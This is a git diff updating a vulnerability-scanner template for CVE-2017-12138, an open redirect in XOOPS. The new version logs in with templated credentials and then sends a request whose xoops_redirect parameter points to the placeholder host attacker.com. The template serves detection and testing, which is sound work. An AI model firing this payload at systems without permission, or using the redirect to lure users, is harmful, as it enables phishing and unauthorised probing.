Update CVE-2017-12138.yaml
parent
98f2956561
commit
de8267aa96
|
@ -14,14 +14,22 @@ info:
|
|||
cvss-score: 6.10
|
||||
cve-id: CVE-2017-12138
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2017,redirect,xoops
|
||||
tags: cve,cve2017,redirect,xoops,authenticated
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/xoops/modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com'
|
||||
- raw:
|
||||
- |
|
||||
POST /user.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
stop-at-first-match: true
|
||||
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
|
||||
|
||||
- |
|
||||
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
|
|
Loading…
Reference in New Issue